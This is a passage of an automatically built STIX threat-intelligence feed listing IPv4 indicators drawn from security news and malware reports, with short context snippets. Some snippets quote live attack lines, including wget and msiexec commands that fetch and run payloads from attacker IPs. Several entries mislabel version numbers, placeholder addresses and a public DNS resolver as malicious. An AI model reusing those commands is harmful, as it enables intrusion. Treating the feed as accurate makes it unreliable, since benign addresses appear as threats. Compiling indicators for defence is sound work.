News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ff4e148-e335-4218-be75-741e9e05a155","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 129.227.46.143","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 31 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious act","pattern":"[ipv4-addr:value = '129.227.46.143']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ce323e4-1ec2-4b65-bcf2-e9d83874b8d7","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 167.254.240.75","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d1","pattern":"[ipv4-addr:value = '167.254.240.75']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10897a64-79a3-4e73-b73a-b1f431824c04","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 167.254.241.119","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress s","pattern":"[ipv4-addr:value = '167.254.241.119']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fb789433-4679-4804-8d74-5c0bb48ba7ed","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 182.10.130.51","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 03.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122","pattern":"[ipv4-addr:value = '182.10.130.51']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6796f62c-4b7d-45da-995b-494bab88f84c","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 185.196.220.85","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: riginated from the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75","pattern":"[ipv4-addr:value = '185.196.220.85']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf0651aa-3f00-47ac-8d8f-568ea7322935","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 189.4.122.140","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 Th","pattern":"[ipv4-addr:value = '189.4.122.140']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f94d247-1952-46ae-9e0a-8eaf1185bc2b","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 216.126.225.208","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: :fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151","pattern":"[ipv4-addr:value = '216.126.225.208']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8110fbba-45ae-49c0-a6d0-4608c6669de8","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 37.9.33.62","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on July 14, 20","pattern":"[ipv4-addr:value = '37.9.33.62']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6a673e8-e005-4ef7-a62f-21d2bf3f38aa","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 64.176.209.104","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said t","pattern":"[ipv4-addr:value = '64.176.209.104']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02c84e1e-9142-41fb-b7f7-c689f691d8e2","created":"2026-09-03T02:07:30.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 162.55.0.0","description":"Seen in \"Security Incident – BGP Hijacking\" (Lobsters · security). Context: an Hetzner’s normal announcement of the surrounding block ( 162.55.0.0/16 ), so under standard BGP route selection it took precede","pattern":"[ipv4-addr:value = '162.55.0.0']","pattern_type":"stix","valid_from":"2026-09-03T02:07:30.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Lobsters · security","url":"https://www.virtualizor.com/blog/security-incident-bgp-hijacking/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d21e2b7-b06b-47c4-b25f-515f6be14f72","created":"2026-09-03T02:07:30.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 162.55.80.0","description":"Seen in \"Security Incident – BGP Hijacking\" (Lobsters · security). Context: TC , a block of IP addresses used by Softaculous services ( 162.55.80.0/24 , part of our infrastructure at Hetzner) was affected by","pattern":"[ipv4-addr:value = '162.55.80.0']","pattern_type":"stix","valid_from":"2026-09-03T02:07:30.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Lobsters · security","url":"https://www.virtualizor.com/blog/security-incident-bgp-hijacking/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35e4121b-39d6-469c-80d1-eaa82b03acf5","created":"2026-09-02T13:12:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 3.2.9.9","description":"Seen in \"BGP Hijack Delivers Malicious Virtualizor Update That Establishes Persistent Root Access\" (The Hacker News). Context: anches. The incident advisory names the release Virtualizor 3.2.9.9 , while the release note calls it Virtualizor 3.2.9 (Releas","pattern":"[ipv4-addr:value = '3.2.9.9']","pattern_type":"stix","valid_from":"2026-09-02T13:12:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bgp-hijack-delivers-malicious.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32608a82-2e67-41c9-a221-23196b24cbc4","created":"2026-09-02T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 176.65.148.184","description":"Seen in \"Exploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586)\" (Help Net Security). Context: include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across mu","pattern":"[ipv4-addr:value = '176.65.148.184']","pattern_type":"stix","valid_from":"2026-09-02T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/02/exploitation-of-sangoma-switchvox-flaw-underway-cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64f038c5-4aa6-4409-a898-9e37dfddbbc4","created":"2026-09-01T21:30:18.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 185.254.222.105","description":"Seen in \"Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)\" (SANS Internet Storm Center). Context: ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 (","pattern":"[ipv4-addr:value = '185.254.222.105']","pattern_type":"stix","valid_from":"2026-09-01T21:30:18.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33300"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0bcc1e2c-9243-441b-89a9-a30c9c680fe9","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 176.65.148.184","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoin","pattern":"[ipv4-addr:value = '176.65.148.184']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4e46c551-d345-4b51-94c9-d4b83ba1dc1a","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.2.2.1","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). Organizations","pattern":"[ipv4-addr:value = '8.2.2.1']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b51192f-b011-4c68-a447-cf82828888ff","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.4.0.2","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency reg","pattern":"[ipv4-addr:value = '8.4.0.2']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dc5d9b68-833a-41f5-84c1-270c21421b35","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 132.223.202.213","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12.","pattern":"[ipv4-addr:value = '132.223.202.213']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--70bbe354-f22a-47d0-ad66-cdb0a6d7707e","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 159.89.156.190","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; /","pattern":"[ipv4-addr:value = '159.89.156.190']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ba299912-ead8-4f4c-b7f7-a6e33897c75b","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 165.227.78.159","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: > < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / >","pattern":"[ipv4-addr:value = '165.227.78.159']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--53834184-4fb4-4c30-8d2a-7ee456eb4961","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 194.187.209.4","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapen","pattern":"[ipv4-addr:value = '194.187.209.4']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fed287e1-5deb-408a-944e-64ab257d0c75","created":"2026-08-17T13:24:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 199.247.6.253","description":"Seen in \"RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families\" (Palo Alto Unit 42). Context: ct ( ^ \"Wscript.Shell^\" ) : v . Run ^ \"msiexec /q /i http://199.247.6.253/ud^\" , false , 0 < nul > C : \\ Windows \\ System32 \\ spool \\","pattern":"[ipv4-addr:value = '199.247.6.253']","pattern_type":"stix","valid_from":"2026-08-17T13:24:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63b2d666-4071-4763-8a6a-97211fb8855a","created":"2026-08-17T13:24:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 89.46.222.97","description":"Seen in \"RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families\" (Palo Alto Unit 42). Context: 90fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47","pattern":"[ipv4-addr:value = '89.46.222.97']","pattern_type":"stix","valid_from":"2026-08-17T13:24:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26b96baf-1c71-44ab-b38a-f08f842b5915","created":"2026-08-17T13:19:12.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 119.104.111.97","description":"Seen in \"xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\" (Palo Alto Unit 42). Context: C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating each","pattern":"[ipv4-addr:value = '119.104.111.97']","pattern_type":"stix","valid_from":"2026-08-17T13:19:12.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--386541e9-5534-404c-adc9-d8cd2d7f837a","created":"2026-08-17T13:19:12.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 1.2.3.4","description":"Seen in \"xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\" (Palo Alto Unit 42). Context: ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 server","pattern":"[ipv4-addr:value = '1.2.3.4']","pattern_type":"stix","valid_from":"2026-08-17T13:19:12.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05160e80-9430-4b21-909e-618fe6d8ae4d","created":"2026-08-17T12:57:39.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 46.166.165.254","description":"Seen in \"New Malware 'Rover' Targets Indian Ambassador to Afghanistan\" (Palo Alto Unit 42). Context: nloader which is used to call out to a server with the IP ' 46.166.165.254 ' and download the main Rover malware along with plugins us","pattern":"[ipv4-addr:value = '46.166.165.254']","pattern_type":"stix","valid_from":"2026-08-17T12:57:39.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/new-malware-rover-targets-indian-ambassador-to-afghanistan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0b43c67c-6dd5-41d6-910a-82680dd59f97","created":"2026-08-17T12:20:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 111.111.111.111","description":"Seen in \"Threat Brief: Ongoing Russia and Ukraine Cyber Activity\" (Palo Alto Unit 42). Context: ping.exe\" ) and action_process_image_command_line contains \"111.111.111.111 -n 5 -w 10\" | fields _time , agent_hostname , actor_effecti","pattern":"[ipv4-addr:value = '111.111.111.111']","pattern_type":"stix","valid_from":"2026-08-17T12:20:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e17019a0-ce35-448f-b81f-158f34116056","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 172.104.31.117","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: iginated from the following IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ip","pattern":"[ipv4-addr:value = '172.104.31.117']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c24514a5-d24d-42fa-9074-5a65ef1a9a78","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 191.37.248.120","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: llowing IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ip","pattern":"[ipv4-addr:value = '191.37.248.120']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bec0ed26-aca7-469e-ab6d-09c24bef9a1b","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 84.17.48.94","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: : IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ipv4 18.221.234.103","pattern":"[ipv4-addr:value = '84.17.48.94']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ef0f3b0-c624-448d-bd4f-18b42c2d9a66","created":"2026-08-17T11:18:17.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 1.2.3.4","description":"Seen in \"Hacking Public Wi-Fi DNS to Steal Credentials\" (Schneier on Security). Context: -browswer. DNS lookup is redirected and goes to a the wrong 1.2.3.4 ip address. As long as that IP address has a security cert,","pattern":"[ipv4-addr:value = '1.2.3.4']","pattern_type":"stix","valid_from":"2026-08-17T11:18:17.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Schneier on Security","url":"https://www.schneier.com/blog/archives/2026/08/hacking-public-wi-fi-dns-to-steal-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4415484-745c-4a58-a06e-2255ffdefcac","created":"2026-08-17T11:18:17.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.8.8.8","description":"Seen in \"Hacking Public Wi-Fi DNS to Steal Credentials\" (Schneier on Security). Context: in LA, what should I do – edit my android hosts file to use 8.8.8.8 to get DNS? Aim my browser at the IP address of my hosting","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-08-17T11:18:17.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Schneier on Security","url":"https://www.schneier.com/blog/archives/2026/08/hacking-public-wi-fi-dns-to-steal-credentials.html"}]}]}